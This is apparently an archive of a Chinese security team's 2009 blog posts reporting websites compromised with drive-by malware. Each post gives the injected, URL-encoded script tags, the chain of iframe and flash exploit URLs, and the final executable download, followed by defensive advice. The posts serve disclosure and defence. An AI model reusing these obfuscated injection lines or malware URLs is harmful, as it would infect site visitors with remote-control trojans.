                        [iframe]http://gda.nna.cc/77/myrax.htm
                            [script]http://gda.nna.cc/77/myrax.swf
                                [exe]http://gda.nna.cc/h/cc.exe
                    [iframe]http://gda.nna.cc/77/rising.htm
                        [iframe]http://gda.nna.cc/77/ofnt.htm
                            [script]http://gda.nna.cc/77/lll.jpg
                            [script]http://gda.nna.cc/77/of1.jpg
                            [script]http://gda.nna.cc/77/of.jpg
                            [script]http://gda.nna.cc/77/of2.jpg
                [script]http://gda.nna.cc/77/fa.js
                    [iframe]http://gda.nna.cc/77/fa.htm
                        [iframe]http://gda.nna.cc/77/ff.html
                        [iframe]http://gda.nna.cc/77/ie.html
                        [iframe]http://gda.nna.cc/77/ff.html
                        [iframe]http://gda.nna.cc/77/ie.html
                        [iframe]http://gda.nna.cc/77/ff.html
                        [iframe]http://gda.nna.cc/77/ff.html
最终下载病毒文件:
http://gda.nna.cc/h/cc.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:7
Google对该网站的判定:恶意

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 5% [?]

网站挂马记录 lk 23 Nov 2009 No Comments

前程无忧论文网被植入恶意代码

发布时间:Sun Nov 22 2009 15:12:19 UTC+0800
最后更新时间:Sun Nov 22 2009 15:12:19 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 前程无忧论文网(http://www.netlw.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.netlw.com/

网页被嵌入恶意链接代码:
<script src=http://%77%2E%73%69%79%6F%75%2E%6F%72%67%2E%63%6E></script>

挂马分析:
[root]http://www.netlw.com/
    [script]http://www.netlw.com/gonggao/gonggao1.asp
        [script]http://w.siyou.org.cn
    [script]http://w.siyou.org.cn
        [iframe]http://2gprs.8866.org/dszq/2.htm
            [iframe]http://107jj.cn/x2/xx.html
                [iframe]http://107jj.cn/x2/yt.htm
                    [script]http://107jj.cn/x2/u.jpg
                    [script]http://107jj.cn/x2/ll1.jpg
                    [script]http://107jj.cn/x2/ul.jpg
                        [exe]http://d.xwsfx.com/1.exe
                        [exe]http://d.xwsfx.com/xx/x2.css
                    [script]http://107jj.cn/x2/llll1.jpg
                    [script]http://107jj.cn/x2/llll.jpg
                    [script]http://107jj.cn/x2/lllll.jpg
                [iframe]http://107jj.cn/x2/ytu.htm
                    [iframe]http://107jj.cn/x2/of.htm
                        [script]http://107jj.cn/x2/ul.jpg
                        [script]http://107jj.cn/x2/hf.jpg
                [iframe]http://107jj.cn/x2/t9.htm
                    [script]http://107jj.cn/x2/ul.jpg
                [iframe]http://107jj.cn/x2/yut.htm
                    [iframe]http://107jj.cn/x2/ytfl1.htm
                        [iframe]http://107jj.cn/x2/x1.htm
                            [script]http://107jj.cn/x2/swfobject.js
                            [flash]http://107jj.cn/x2/./x1.swf
                                [exe]http://d.xwsfx.com/xx/x2.css
                            [flash]http://107jj.cn/x2/./x3.swf
                                [exe]http://d.xwsfx.com/xx/x2.css
                            [flash]http://107jj.cn/x2/./x4.swf
                                [exe]http://d.xwsfx.com/xx/x2.css
                            [flash]http://107jj.cn/x2/./x2.swf
                                [exe]http://d.xwsfx.com/xx/x2.css
                        [iframe]http://107jj.cn/x2/x2.htm
                            [script]http://107jj.cn/x2/swfobject.js
                            [flash]http://107jj.cn/x2/./x7.swf
                                [exe]http://d.xwsfx.com/xx/x2.css
                            [flash]http://107jj.cn/x2/./x9.swf
                                [exe]http://d.xwsfx.com/xx/x2.css
                            [flash]http://107jj.cn/x2/./x10.swf
                                [exe]http://d.xwsfx.com/xx/x2.css
                            [flash]http://107jj.cn/x2/./x8.swf
                                [exe]http://d.xwsfx.com/xx/x2.css
                        [iframe]http://107jj.cn/x2/x1.htm
最终下载病毒文件:
http://d.xwsfx.com/1.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:55
Google对该网站的判定:恶意

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 22 Nov 2009 No Comments

戏迷网被植入恶意代码

发布时间:Thu Nov 19 2009 18:47:38 UTC+0800
最后更新时间:Thu Nov 19 2009 18:47:38 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 戏迷网(http://ximiw.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://ximiw.com/

网页被嵌入恶意链接代码:
<script src=http://%61%6C%74zx.cn></script><script src=http://b%79%6E%72%6F%6C.%63%6E></script><script src=http://%62%79nr%74v.%63n></script><script src=http://%63it%79%73b%62s%2Ec%6E></script><script src=http://%63nn%65%69%6D%65ngg%75.%63%6E></script>

挂马分析:
[root]http://ximiw.com/
    [script]http://altzx.cn
        [iframe]http://8pio.8866.org/dszq/2.htm
    [script]http://bynrol.cn
        [iframe]http://8pio.8866.org/dszq/2.htm
    [script]http://bynrtv.cn
        [iframe]http://8pio.8866.org/dszq/2.htm
            [iframe]http://709ff.cn/x2/xx.html
                [iframe]http://709ff.cn/x2/yt.htm
                    [script]http://709ff.cn/x2/ll.jpg
                    [script]http://709ff.cn/x2/ll1.jpg
                    [script]http://709ff.cn/x2/lll.jpg
                    [script]http://709ff.cn/x2/llll1.jpg
                    [script]http://709ff.cn/x2/llll.jpg
                    [script]http://709ff.cn/x2/lllll.jpg
                [iframe]http://709ff.cn/x2/ytu.htm
                    [iframe]http://709ff.cn/x2/of.htm
                        [script]http://709ff.cn/x2/lll.jpg
                        [script]http://709ff.cn/x2/of.jpg
                [iframe]http://709ff.cn/x2/t9.htm
                    [script]http://709ff.cn/x2/lll.jpg
                        [exe]http://d.khtgf.cn/xx/x2.css
                [iframe]http://709ff.cn/x2/yut.htm
                    [iframe]http://709ff.cn/x2/ytfl1.htm
                        [iframe]http://709ff.cn/x2/x1.htm
                            [script]http://709ff.cn/x2/swfobject.js
                            [flash]http://709ff.cn/x2/./x1.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                            [flash]http://709ff.cn/x2/./x3.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                            [flash]http://709ff.cn/x2/./x4.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                            [flash]http://709ff.cn/x2/./x2.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                        [iframe]http://709ff.cn/x2/x2.htm
                            [script]http://709ff.cn/x2/swfobject.js
                            [flash]http://709ff.cn/x2/./x7.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                            [flash]http://709ff.cn/x2/./x9.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                            [flash]http://709ff.cn/x2/./x10.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                            [flash]http://709ff.cn/x2/./x8.swf
                                [exe]http://d.khtgf.cn/xx/x2.css
                        [iframe]http://709ff.cn/x2/x1.htm
    [script]http://citysbbs.cn
        [iframe]http://8pio.8866.org/dszq/2.htm
    [script]http://cnneimenggu.cn
        [iframe]http://8pio.8866.org/dszq/2.htm
最终下载病毒文件:
http://d.khtgf.cn/xx/x2.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

 该网站历史挂马次数:2
Google对该网站的判定:恶意

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.comsec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 6% [?]

网站挂马记录 lk 19 Nov 2009 No Comments

Next Page »

Recommended: Buy movies online.